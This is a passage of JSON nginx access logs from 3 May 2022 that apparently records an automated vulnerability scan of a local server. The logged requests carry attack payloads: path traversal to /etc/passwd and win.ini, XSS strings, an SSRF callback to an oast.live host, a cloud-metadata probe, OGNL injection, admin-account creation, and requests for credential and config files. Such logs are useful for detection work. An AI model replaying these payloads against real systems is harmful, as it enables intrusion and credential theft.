+0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET //%EF%BD%B0example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.312","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /remote/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.312","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/opc/v1/instance HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.165","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"28fHqNWjv4aFIDn2UgPF6todbvu","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"PUT /testing-put.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.369","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/threaddump HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.167","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /mifs/c/d/android.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.313","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /am/json/serverinfo/* HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.775","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /poc.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.295","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/51 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.160","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /templates/editor-preload-container HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.344","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.js HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.350","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pages HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.376","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /default.php.bak HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.319","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /DnnImageHandler.ashx?mode=file&url=http://c9oms3gsmpve1ijt0mc0c1rdz49ouyd8a.oast.live HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.327","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /%3C%3E//example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.267","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /fpui/loginServlet HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.275","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"success=%2Fshare%2Fpage%2F&failure=:\x5C\x5Cgoogle.com&username=baduser&password=badpass","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /share/page/dologin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.286","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/mc4wp-debug.log HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.288","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/cipher.aes HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.264","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"{\x22dashboard\x22: {\x22editable\x22:false,\x22hideControls\x22:true,\x22nav\x22:[{\x22enable\x22:false,\x22type\x22:\x22timepicker\x22}],\x22rows\x22: [{}],\x22style\x22:\x22dark\x22,\x22tags\x22:[],\x22templating\x22:{\x22list\x22:[]},\x22time\x22:{},\x22timezone\x22:\x22browser\x22,\x22title\x22:\x22Home\x22,\x22version\x22:5},\x22expires\x22: 3600}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/snapshots HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.782","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /WAN_wan.htm?.gif HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.389","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /testing-put.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.333","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/Attitude/go.php?https://example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.297","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-config.php.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.749","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"----------------------------835846770881083140190633\x0D\x0AContent-Disposition: form-data; name=\x22editormd-image-file\x22; filename=\x22test.<>php\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0A\x0D\x0A----------------------------835846770881083140190633--\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /index.php?s=/home/page/uploadImg HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.367","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"log=28fHqYcZCnnYYBQBTMS7aA8rUkE@example.com&pwd=28fHqYcZCnnYYBQBTMS7aA8rUkE@example.com&wp-submit=Log+In","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.086","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.min.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.332","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /db_dump.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.168","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/user_add.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /domcfg.nsf HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.327","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"action=verify-haras","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /cgi-bin/rpc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.396","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /@example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.406","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /main.php.bak HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.414","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.295","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.407","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/webcm?getpage=../html/login.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.282","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /debug/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.336","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.140","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.294","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-config.php.bak HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.327","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/52 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.707","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc....4.2.1....json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.850","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.438","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:06 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /./../../../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.069","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /dompdf.php?input_file=dompdf.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.332","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.252","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /configprops HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.271","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=VlYQQv&adminpassword=wlmNcK&adminemail=test@test.com&adminname=test HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.283","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.netrc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.404","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\x22> HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.284","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /autodiscover/autodiscover.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.348","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.idea/dataSources.xml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.330","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /config.php.bak HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.389","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /confluence HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.353","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/53 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.367","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.259","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.css HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.398","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:03:07 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /actuator/configprops HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.288","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", 